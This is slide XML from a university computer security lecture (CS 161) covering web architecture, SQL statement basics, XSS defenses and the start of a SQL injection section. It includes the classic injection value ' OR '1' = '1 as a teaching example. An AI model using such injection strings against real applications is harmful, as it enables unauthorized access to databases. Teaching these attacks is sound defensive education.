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577D0C-167A-49ED-8727-562A38F614A0}">
  <a:tblStyle styleId="{CC577D0C-167A-49ED-8727-562A38F614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D17B31-A734-46B0-8B05-200C5F7506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1"/>
    <p:restoredTop sz="94694"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="172" d="100"/>
          <a:sy n="172" d="100"/>
        </p:scale>
        <p:origin x="46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97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top25/archive/2020/2020_cwe_top25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59d2ce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959d2ce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59d2ced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59d2ced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959d2ced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959d2ced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59d2ce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959d2ce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59d2ced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59d2ced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59d2ce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59d2ce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59d2ce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59d2ce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59d2ced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59d2ced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59d2ce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59d2ce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59d2ced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59d2ced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959d2ced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959d2ced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59d2ce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959d2ce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59d2ced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59d2ced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59d2ced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59d2ced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59d2ced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959d2ced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59d2ced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959d2ced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59d2ce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59d2ce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59d2ced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59d2ced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959d2ced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959d2ced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59d2ced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59d2ced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959d2ced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959d2ced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959d2ce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959d2ce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59d2ced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59d2ced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959d2ced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959d2ced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59d2ced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59d2ced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59d2ced3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959d2ced3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959d2ced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959d2ced3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59d2ced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59d2ced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959d2ced3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959d2ced3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959d2ced3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959d2ced3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959d2ced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959d2ced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959d2ced3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959d2ced3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959d2ce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959d2ce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6cbd13de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6cbd13de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cbd13de4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6cbd13de4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6cbd13de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6cbd13de4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959d2ced3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959d2ced3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59d2ced3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959d2ced3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959d2ced3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959d2ced3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59d2ced3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59d2ced3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959d2ced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959d2ced3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59d2ced3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959d2ced3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959d2ced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959d2ced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59d2ced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959d2ced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959d2ced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959d2ced3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959d2ced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959d2ced3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959d2ced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959d2ced3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959d2ced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959d2ced3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https://xkcd.com/1897/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959d2ced3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959d2ced3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959d2ced3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959d2ced3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959d2ced3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959d2ced3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959d2ced3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959d2ced3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6cbd13de4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6cbd13de4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6cbd13de4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6cbd13de4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59d2ced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59d2ced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6cbd13de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6cbd13de4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6cbd13de4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6cbd13de4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6cbd13de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6cbd13de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6cbd13de4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6cbd13de4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6cbd13de4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6cbd13de4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6cbd13de4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6cbd13de4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6cbd13de4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6cbd13de4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59d2ce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59d2ce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59d2ce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59d2ce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59d2ced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959d2ced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75EED6CE-A6E7-DC13-386B-545D98D97500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89.html" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/190.html" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/732.html" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/79.html" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/119.html" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/78.html" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/434.html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cwe.mitre.org/data/definitions/287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we.mitre.org/data/definitions/125.html" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/352.html" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/20.html" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/476.html" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/416.html" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/94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4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/22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and CAPTCHAs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161 Fall 2022 - Lecture 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37" name="Google Shape;137;p26"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="542150" y="1655125"/>
            <a:ext cx="1562700" cy="3008100"/>
            <a:chOff x="542150" y="1655125"/>
            <a:chExt cx="1562700" cy="3008100"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="138" name="Google Shape;138;p26"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="542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Client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Handle HTML, CSS, JavaScript, etc.</a:t>
              </a:r>
              <a:endParaRPr sz="1000"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="139" name="Google Shape;139;p26" descr="Chrome Logo, Chrome Symbol, Meaning, History and Evolution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125" y="3421041"/>
              <a:ext cx="62020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 descr="Firefox - Wikipedi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6294" y="3421041"/>
              <a:ext cx="536331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6" descr="Microsoft Edge - Wikipedia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644" y="4036616"/>
              <a:ext cx="505150" cy="5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6" descr="Brave Browser Review: Can it Topple Chrome and Safari? - Crypto Radar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1887" y="4036616"/>
              <a:ext cx="505149" cy="505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26"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3790650" y="1655125"/>
            <a:ext cx="1562700" cy="3008100"/>
            <a:chOff x="3790650" y="1655125"/>
            <a:chExt cx="1562700" cy="3008100"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="144" name="Google Shape;144;p26"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="37906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Web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Process requests and handle server-side logic</a:t>
              </a:r>
              <a:endParaRPr sz="1000"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="145" name="Google Shape;14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42226" y="3494954"/>
              <a:ext cx="859545" cy="328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6" descr="File:Nginx logo.svg - Wikimedia Commons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42229" y="3949478"/>
              <a:ext cx="859550" cy="18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6" descr="IIS - The Process Cannot Access the File Because it is Being Used by Another Process - Scott Brady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42213" y="4257474"/>
              <a:ext cx="859549" cy="368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26"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7039150" y="1655125"/>
            <a:ext cx="1562700" cy="3008100"/>
            <a:chOff x="7039150" y="1655125"/>
            <a:chExt cx="1562700" cy="3008100"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="149" name="Google Shape;149;p26"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7039150" y="1655125"/>
              <a:ext cx="1562700" cy="3008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Database Server</a:t>
              </a:r>
              <a:endParaRPr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Store and provide access to persistent data</a:t>
              </a:r>
              <a:endParaRPr sz="1000"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="150" name="Google Shape;150;p26" descr="MySQL Logo - PNG e Vetor - Download de Logo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37747" y="3549184"/>
              <a:ext cx="620199" cy="422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6" descr="PostgreSQL - Wikipedia, la enciclopedia libre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83050" y="3440175"/>
              <a:ext cx="620200" cy="64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6" descr="Microsoft SQL server Logo PNG Transparent &amp; SVG Vector - Freebie Supply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37747" y="4125241"/>
              <a:ext cx="620200" cy="50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883048" y="4292263"/>
              <a:ext cx="620201" cy="16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6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2191600" y="2301475"/>
            <a:ext cx="1502100" cy="338700"/>
            <a:chOff x="2191600" y="2301475"/>
            <a:chExt cx="1502100" cy="338700"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="155" name="Google Shape;155;p26"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="21916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6" name="Google Shape;156;p26"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="21916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HTTP GET request</a:t>
              </a:r>
              <a:endParaRPr sz="1000"/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38209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 Interpret request</a:t>
            </a:r>
            <a:endParaRPr sz="10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5445200" y="2301475"/>
            <a:ext cx="1502100" cy="338700"/>
            <a:chOff x="5445200" y="2301475"/>
            <a:chExt cx="1502100" cy="338700"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="159" name="Google Shape;159;p26"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5445200" y="264017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" name="Google Shape;160;p26"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5445200" y="230147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4. Query database</a:t>
              </a:r>
              <a:endParaRPr sz="1000"/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5445200" y="2880725"/>
            <a:ext cx="1502100" cy="338700"/>
            <a:chOff x="5445200" y="2880725"/>
            <a:chExt cx="1502100" cy="338700"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="162" name="Google Shape;162;p26"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="54452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3" name="Google Shape;163;p26"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="54452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5. Return data</a:t>
              </a:r>
              <a:endParaRPr sz="1000"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="164" name="Google Shape;164;p26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3820950" y="288072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6. Construct response</a:t>
            </a:r>
            <a:endParaRPr sz="1000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="165" name="Google Shape;165;p26"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2196700" y="2880725"/>
            <a:ext cx="1502100" cy="338700"/>
            <a:chOff x="2196700" y="2880725"/>
            <a:chExt cx="1502100" cy="338700"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="166" name="Google Shape;166;p26"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="2196700" y="3219425"/>
              <a:ext cx="15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7" name="Google Shape;167;p26"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="2196700" y="2880725"/>
              <a:ext cx="1502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7. HTTP response</a:t>
              </a:r>
              <a:endParaRPr sz="1000"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="168" name="Google Shape;168;p26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="572450" y="2301475"/>
            <a:ext cx="150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 User requests page</a:t>
            </a:r>
            <a:endParaRPr sz="1000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="169" name="Google Shape;169;p26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="572450" y="2880725"/>
            <a:ext cx="150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8. Browser renders page</a:t>
            </a:r>
            <a:endParaRPr sz="1000"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2233300" y="4206575"/>
            <a:ext cx="1428900" cy="338700"/>
            <a:chOff x="2233300" y="4206575"/>
            <a:chExt cx="1428900" cy="338700"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="171" name="Google Shape;171;p26"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2595100" y="4206575"/>
              <a:ext cx="7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HTTP</a:t>
              </a:r>
              <a:endParaRPr sz="1000" b="1"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="172" name="Google Shape;172;p26"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="171" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="22333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3" name="Google Shape;173;p26"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="171" idx="3"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="33004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4" name="Google Shape;174;p26"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5481800" y="4129625"/>
            <a:ext cx="1428900" cy="492600"/>
            <a:chOff x="5481800" y="4129625"/>
            <a:chExt cx="1428900" cy="492600"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="175" name="Google Shape;175;p26"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5843600" y="4129625"/>
              <a:ext cx="705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SQL (usually)</a:t>
              </a:r>
              <a:endParaRPr sz="1000" b="1"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="176" name="Google Shape;176;p26"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="175" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="54818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177;p26"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="175" idx="3"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6548900" y="4375925"/>
              <a:ext cx="361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this class, we will cover SQL databases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 = Structured Query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database has a number of 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table has a predefined structure, so it has columns for each field and rows for each entry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server manages access and storage of these databases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Structured Query Language</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>): The language used to interact with and manage data stored in a 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Defined by the International Organization for Standardization (ISO) and implemented by many SQL servers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SQL servers are ACID (atomicity, consistency, isolation, and durability)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Essentially ensures that the database will never store a partial operation, return an invalid state, or be vulnerable to race conditions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Declarative programming language, rather than imperative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Declarative: Use code to define the result you want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Imperative: Use code to define exactly what to do (e.g. C, Python, Go)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is used to select some columns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[columns] FROM [table]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00" name="Google Shape;200;p29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name, age FROM bots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9" name="Google Shape;209;p30"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="312500" y="305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94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2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17" name="Google Shape;217;p31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8" name="Google Shape;218;p31"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="278300" y="294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9" name="Google Shape;219;p31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2500" y="1244825"/>
            <a:ext cx="3504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asterisk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) is shorthand for “all columns.” Select all columns from the table, keeping all rows.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SELECT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8" name="Google Shape;228;p32"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="278300" y="294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4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2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223575" y="2511725"/>
            <a:ext cx="44115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'CS', '161' FROM bots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312500" y="1244825"/>
            <a:ext cx="3504900" cy="400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constants instead of columns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can be used to filter out certain rows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comparison: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/>
              <a:t> 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operators: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/>
              <a:t>,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AND has precedence over OR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" name="Google Shape;246;p34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*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likes = 'pancakes'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only the rows where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likes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> column has value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pancakes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312500" y="29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row,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WHERE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255" name="Google Shape;255;p35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" name="Google Shape;256;p35"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="223575" y="2206925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name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&lt; 2 OR id =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2500" y="1244825"/>
            <a:ext cx="3504900" cy="6156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names of bots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/>
              <a:t> is less than 2 or whose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/>
              <a:t> is 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298500" y="29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14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rows, 1 column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9" name="Google Shape;259;p35"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1798650" y="33184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chemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> is 1)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798650" y="3718675"/>
            <a:ext cx="2250600" cy="369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(selected because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200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> is 1.5)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INTO is used to add rows into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is used for defining constant rows and columns, usually to be inserted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5488250" y="21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INSERT INTO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275" name="Google Shape;275;p37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6" name="Google Shape;276;p37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INSERT INTO items VALUES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(4, 'willow', 'catnip', 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(5, 'luna', 'naps', 7)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7" name="Google Shape;277;p37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278" name="Google Shape;278;p37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0" name="Google Shape;280;p37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extra rows being added to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is used to change the values of existing rows in a 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Followed by SET after the table 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[column] = [value]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3;p39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UPDATE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SET age = 6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name = 'willow'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" name="Google Shape;297;p39"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1347300" y="3136575"/>
            <a:ext cx="7339225" cy="1707075"/>
            <a:chOff x="1347300" y="3136575"/>
            <a:chExt cx="7339225" cy="1707075"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="298" name="Google Shape;298;p39"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2913750" y="3899750"/>
              <a:ext cx="5772775" cy="943900"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="230911" h="37756" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="0" y="4651"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="37756"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="230911" y="37756"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="230911" y="0"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:cu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99" name="Google Shape;299;p39"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1347300" y="3136575"/>
              <a:ext cx="32247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this cell in the table being changed. If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WHERE</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en"/>
                <a:t> clause was missing, every value in the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age</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en"/>
                <a:t> column would be set to 6.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FROM is used to delete rows from a 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combined with WHERE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[table]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[condition]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07" name="Google Shape;307;p40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41"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5488250" y="17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willow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catnip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luna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naps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200" b="1" strike="sng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DELETE</a:t>
            </a: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4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="223575" y="1860333"/>
            <a:ext cx="44115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DELETE FROM bots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WHERE age &gt;= 6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6" name="Google Shape;316;p41"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1347300" y="3622175"/>
            <a:ext cx="4140950" cy="615600"/>
            <a:chOff x="1347300" y="3622175"/>
            <a:chExt cx="4140950" cy="615600"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="317" name="Google Shape;317;p41"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4503350" y="37590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41"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4503350" y="4068700"/>
              <a:ext cx="9849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9" name="Google Shape;319;p41"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1347300" y="36221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two rows being deleted from the table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is used to create tables (and sometimes databases)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5488250" y="146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CREATE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334" name="Google Shape;334;p43"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5488250" y="12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5" name="Google Shape;335;p43"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5488250" y="35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CREATE TABLE cats (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id INT,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name VARCHAR(255),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likes VARCHAR(255),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   age INT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37" name="Google Shape;337;p43"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="492325" y="3778525"/>
            <a:ext cx="4986300" cy="615600"/>
            <a:chOff x="492325" y="3778525"/>
            <a:chExt cx="4986300" cy="615600"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="338" name="Google Shape;338;p43"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="339" idx="3"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3717025" y="408632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9" name="Google Shape;339;p43"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="492325" y="377852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a new table being created with the given columns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40" name="Google Shape;340;p43"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3608050" y="2049300"/>
            <a:ext cx="1509900" cy="831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VARCHAR(255)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> is a string type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is used to delete tables (and sometimes databases)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Syntax:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/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[table]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348" name="Google Shape;348;p44"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5488250" y="12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9" name="Google Shape;349;p44"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5488250" y="35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DROP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356" name="Google Shape;356;p45"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5488250" y="12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bots</a:t>
                      </a:r>
                      <a:endParaRPr sz="1200" b="1" i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evanbot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pancakes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codabot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pintobot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beans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strike="sng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1.5</a:t>
                      </a:r>
                      <a:endParaRPr sz="1200" b="1" strike="sng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0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7" name="Google Shape;357;p45"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5488250" y="35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{DFD17B31-A734-46B0-8B05-200C5F750624}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="3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cats</a:t>
                      </a:r>
                      <a:endParaRPr sz="1200" b="1" i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likes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12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rows, 4 columns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" name="Google Shape;358;p45"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="223575" y="1469825"/>
            <a:ext cx="4194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DROP TABLE bots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9" name="Google Shape;359;p45"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="501950" y="2202375"/>
            <a:ext cx="4986300" cy="615600"/>
            <a:chOff x="501950" y="2202375"/>
            <a:chExt cx="4986300" cy="615600"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="360" name="Google Shape;360;p45"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="361" idx="3"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3726650" y="2510175"/>
              <a:ext cx="1761600" cy="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1" name="Google Shape;361;p45"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="501950" y="2202375"/>
              <a:ext cx="3224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statement results in the entire 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bots</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en"/>
                <a:t> table being deleted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XSS Defenses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Templates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 creates the HTML based on a template and automatically handles all sanitization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SQL: Syntax Characters</a:t>
            </a:r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/>
              <a:t> (two dashes) is used for single-line comments (like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/>
              <a:t> in Python or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/>
              <a:t> in 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Semicolons separate different statements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UPDATE items SET price = 2 WHERE id = 4;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en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SELECT price FROM items WHERE id = 4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Returns a single column with a row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/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1"/>
              <a:t>only if</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> there already exists a row with ID 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is really complicated, but you only need to know the basics for this class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paperclips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79" name="Google Shape;379;p47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81" name="Google Shape;381;p47"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5128700" y="2446113"/>
            <a:ext cx="3724800" cy="1029600"/>
            <a:chOff x="5128700" y="2446113"/>
            <a:chExt cx="3724800" cy="1029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5128700" y="3075513"/>
              <a:ext cx="37248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Remember this string manipulation issue?</a:t>
              </a:r>
              <a:endParaRPr/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="383" name="Google Shape;383;p47"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="382" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="6731300" y="2446113"/>
              <a:ext cx="259800" cy="62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396" name="Google Shape;396;p48"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4747025" y="3010850"/>
            <a:ext cx="3440400" cy="1595100"/>
            <a:chOff x="4747025" y="3010850"/>
            <a:chExt cx="3440400" cy="1595100"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="397" name="Google Shape;397;p48"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5044625" y="3010850"/>
              <a:ext cx="31428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Invalid SQL executed by the server, 500 Internal Server Error</a:t>
              </a:r>
              <a:endParaRPr/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="398" name="Google Shape;398;p48"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="397" idx="2"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="4747025" y="3626450"/>
              <a:ext cx="1869000" cy="97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 OR '1' = '1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11" name="Google Shape;411;p49"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5348650" y="3048550"/>
